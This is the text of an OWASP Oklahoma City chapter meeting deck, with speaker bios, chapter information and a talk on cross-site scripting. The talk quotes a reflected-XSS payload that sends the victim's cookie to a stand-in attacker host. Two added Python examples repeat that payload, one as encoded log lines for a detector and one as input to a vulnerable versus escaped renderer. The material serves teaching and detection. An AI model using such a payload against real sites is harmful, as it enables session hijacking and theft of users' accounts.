Oklahoma City
Welcome!
Thanks to our sponsors!
- OWASP
- RCB Bank
- Crossroads Information Security
Joe Sullivan
- Started in infosec with a web hosting company in 1999
- Started one of the first outsourced support companies for web hosting servers in 2000
- Worked for an ecommerce company for 10 years in network security
- Currently CISO for RCB Bank
- 1 to 1 Risk Control & Investigations – Owner/Lead Investigator
- Consulting for Crossroads Information Security
- SANS Mentor, SEC504 Hacker Tools, Techniques, Exploits, and Incident Handling
Jim Thavisouk
Jim Thavisouk is currently working at GitLab as their Senior Security Automation Engineer. He has been working closely with automating security in the cloud for the past two years. Before GitLab, he worked with various government agencies, including the Department of Defense and the Department of Energy, where he focused on vulnerability research against a variety of technologies. Jim also holds a Master's Degree in Computer Science from the University of Tulsa's Cyber Corps program.
Stacy Dunn
- OWASP Oklahoma City Chapter Leader
- Information Security Analyst, RCB Bank
- Board Member of Super! BitCon, a local gaming convention
- Curator and Founder at Oklahoma Artcade
- Super nerd
Contact Information
- Joe Sullivan: joe.sullivan@owasp.org
- Jim Thavisouk: jim.thavisouk@owasp.org
- Stacy Dunn: stacy.dunn@owasp.org
Oklahoma City Chapter
- The official page is at: https://www.owasp.org/index.php/Oklahoma_City
- Twitter: @okcowasp
- Facebook
- YouTube
- MeetUp: https://www.meetup.com/Oklahoma-City-Chapter-Meetup/
- https://owasp.herokuapp.com/ <- Join us on Slack!
OWASP
The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies and other organizations worldwide. Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.
OWASP Top 10
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.
OWASP Top 10 2017
Membership
Individual Members support OWASP at the $50 USD* level annually. There is also a 2-year membership for $95 USD* and a Lifetime membership for $500 USD*. To find out more about Individual Membership, please visit the Individual Member page.
- Membership is optional
- Meetings are open to everyone
- Guests are welcome
- Memberships help fund our chapter
Meetings
- Web Application Security
- Web Application Development
- Presentations
- Labs
- Networking
- Round Tables
- Food
The Future
- Conferences (IWS coming up)
- Speakers
- Presentations
- News
- Challenge Coins
- Promo Materials
- Volunteers are welcome!
Speaking of Presentations
Cross Site Scripting
- XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications
- Better described as a code reflection attack
- An attacker crafts a URL with a script in it
- The script in the URL is sent to the server as input
- When the user accesses the URL, the server reflects the script contained in the URL back to the browser
- The user's browser processes the script and performs whatever action the script was set to run
Cross Site Scripting Attack Scenario
HTML without validation or escaping:

    (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

Attacker modifies the CC parameter to:

    '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.

This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.
More Cross Site Scripting Attacks
- Port scanning your internal network using XSS attacks (https://www.symantec.com/connect/blogs/getting-sassy-xss-part-3-port-scanning)
- Attacking log viewers and user interfaces with XSS
- Using the Browser Exploitation Framework (BeEF) to attack browsers: https://www.cybrary.it/0p3n/tutorial-xss-exploitation-beef/
- Using XSS we can steal cookies, scan networks, hook into browsers and do a lot more
- Good for getting a foothold on a network
Detecting Cross Site Scripting Attacks
- This is a noisy attack
- Generates logs
- SIEM can detect attacks, but may miss obfuscation techniques
- IPS can alert to XSS attacks
- IDS can alert to XSS attacks
- Web application firewall
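As an added example (not part of the deck), the kind of log-side check a SIEM rule or a quick triage script would run over web server access logs: it pulls each request's query parameters, URL-decodes them until the value stops changing, and flags the script markers from the scenario above. The log lines are constructed, and the comparison with a single-pass decoder shows the obfuscation gap the slide warns about.

```python
import re
from urllib.parse import parse_qsl, unquote, urlparse

# Constructed sample access-log lines (not real traffic). Line 2 carries the deck's
# payload URL-encoded once; line 3 carries a script tag URL-encoded twice, the kind of
# obfuscation that slips past a detector which decodes only once.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2018:10:00:01] "GET /checkout?CC=4111111111111111 HTTP/1.1" 200 512
10.0.0.9 - - [01/Mar/2018:10:00:02] "GET /checkout?CC=%27%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.attacker.com%2Fcgi-bin%2Fcookie.cgi%3Ffoo%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 980
10.0.0.9 - - [01/Mar/2018:10:00:03] "GET /checkout?CC=%2527%253E%253Cscript%253E%253C%252Fscript%253E HTTP/1.1" 200 980
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markers for the reflected-XSS patterns discussed in the deck; case-insensitive on purpose.
XSS_MARKERS = re.compile(r"<\s*script|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """URL-decode until the value stops changing (bounded), so double encoding is not a hiding place."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_requests(log_text: str, decode_fully: bool = True):
    """Return (client_ip, param, decoded_value) for each query parameter that carries an XSS marker."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlparse(m.group("target")).query
        # parse_qsl already performs one round of URL decoding.
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = fully_decode(value) if decode_fully else value
            if XSS_MARKERS.search(decoded):
                hits.append((client_ip, name, decoded))
    return hits


if __name__ == "__main__":
    for ip, param, value in find_xss_requests(SAMPLE_LOG):
        print(f"possible XSS from {ip} in parameter {param}: {value[:60]}")
    print("single-decode detector hits:", len(find_xss_requests(SAMPLE_LOG, decode_fully=False)))
```

A production rule would also look at POST bodies, headers and cookies, since only GET query strings show up in a default access log.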
Preventing Cross Site Scripting
- Filter out meta characters from requests – do this on the server side, not the client side
- Microsoft offers a free anti-XSS library
- Use frameworks that automatically escape XSS by design, such as the latest Ruby on Rails or React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered.
- Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet 'XSS Prevention' has details on the required data escaping techniques.
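The attack scenario slide and the context-aware escaping bullet above, worked through as an added example that is not from the deck: the deck's Java concatenation is reproduced in Python, then rendered beside an attribute-context escaped version, and a tolerant HTML parser (standing in for the browser) shows which elements each version actually produces. The attacker value is the deck's own CC payload; the function names are this example's.

```python
import html
from html.parser import HTMLParser

# Constructed attacker-controlled value, taken from the deck's CC-parameter scenario.
ATTACK_CC = ("'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='"
             "+document.cookie</script>")


def render_cc_input_vulnerable(cc: str) -> str:
    """Same concatenation as the deck's snippet: untrusted data dropped into an attribute unescaped."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_cc_input_escaped(cc: str) -> str:
    """Attribute context: encode & < > " ' before interpolating (quote=True covers both quote styles)."""
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


class TagCollector(HTMLParser):
    """Records the elements a tolerant HTML parser sees, which is roughly what a browser will act on."""

    def __init__(self):
        super().__init__()
        self.tags, self.input_attrs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)  # entity references are decoded here, as a browser would


def browser_view(markup: str):
    """Return (list of start tags, attributes of the input element) for the rendered markup."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_attrs


if __name__ == "__main__":
    for label, render in (("vulnerable", render_cc_input_vulnerable), ("escaped", render_cc_input_escaped)):
        tags, attrs = browser_view(render(ATTACK_CC))
        print(f"{label}: tags={tags} value={attrs.get('value')!r}")
```

The escaped version keeps the whole payload inside the value attribute as inert text; the same value dropped into a JavaScript or URL context would need that context's encoder instead, which is the point of the cheat sheet reference.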
Preventing Cross Site Scripting
- Run web application penetration tests regularly
- Test when changes are implemented to the web application
- Test when new attacks come out
- Work with your web application developer on testing and remediation
Discussion
What would you like to get out of our meetings?
- Web Application Security
- Vulnerability Testing and Remediation
- Development
- Security Operations
- Penetration Testing
- Incident Response
- Defending Web Applications